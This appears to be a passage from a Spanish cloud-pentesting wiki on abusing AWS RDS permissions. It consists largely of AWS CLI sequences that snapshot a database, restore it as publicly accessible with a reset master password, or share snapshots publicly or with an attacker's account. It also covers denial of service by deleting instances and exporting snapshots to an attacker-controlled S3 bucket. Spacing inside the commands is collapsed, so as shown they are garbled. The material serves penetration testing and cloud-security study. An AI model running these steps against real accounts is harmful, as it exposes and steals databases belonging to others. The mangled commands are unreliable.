Si el atacante tiene suficientes permisos, podría hacer que una BD sea accesible públicamente creando una instantánea de la BD y luego una BD accesible públicamente a partir de la instantánea.
awsrdsdescribe-db-instances# Get DB identifierawsrdscreate-db-snapshot \--db-instance-identifier <db-id> \--db-snapshot-identifier cloudgoat# Get subnet groups & security groupsawsrdsdescribe-db-subnet-groupsawsec2describe-security-groupsawsrdsrestore-db-instance-from-db-snapshot \--db-instance-identifier "new-db-not-malicious" \--db-snapshot-identifier <scapshotId> \--db-subnet-group-name <dbsubnetgroup> \--publicly-accessible \--vpc-security-group-ids <ec2-securitygroup>awsrdsmodify-db-instance \--db-instance-identifier "new-db-not-malicious" \--master-user-password 'Llaody2f6.123' \--apply-immediately# Connect to the new DB after a few mins
Un atacante con estos permisos podría crear una instantánea de una base de datos y hacerla pública. Luego, simplemente podría crear en su propia cuenta una base de datos a partir de esa instantánea.
Si el atacante no tiene el permiso rds:CreateDBSnapshot, aún podría hacer públicas otras instantáneas creadas.
# create snapshotawsrdscreate-db-snapshot--db-instance-identifier<db-instance-identifier>--db-snapshot-identifier<snapshot-name># Make it public/share with attackers accountaws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
Impacto Potencial: Acceso a información sensible o acciones no autorizadas utilizando credenciales filtradas.
rds:DeleteDBInstance
Un atacante con estos permisos puede realizar un ataque de denegación de servicio (DoS) a instancias RDS existentes.
Impacto potencial: Eliminación de instancias RDS existentes y posible pérdida de datos.
rds:StartExportTask
TODO: Probar
Un atacante con este permiso puede exportar una instantánea de una instancia RDS a un bucket de S3. Si el atacante tiene control sobre el bucket de S3 de destino, potencialmente puede acceder a datos sensibles dentro de la instantánea exportada.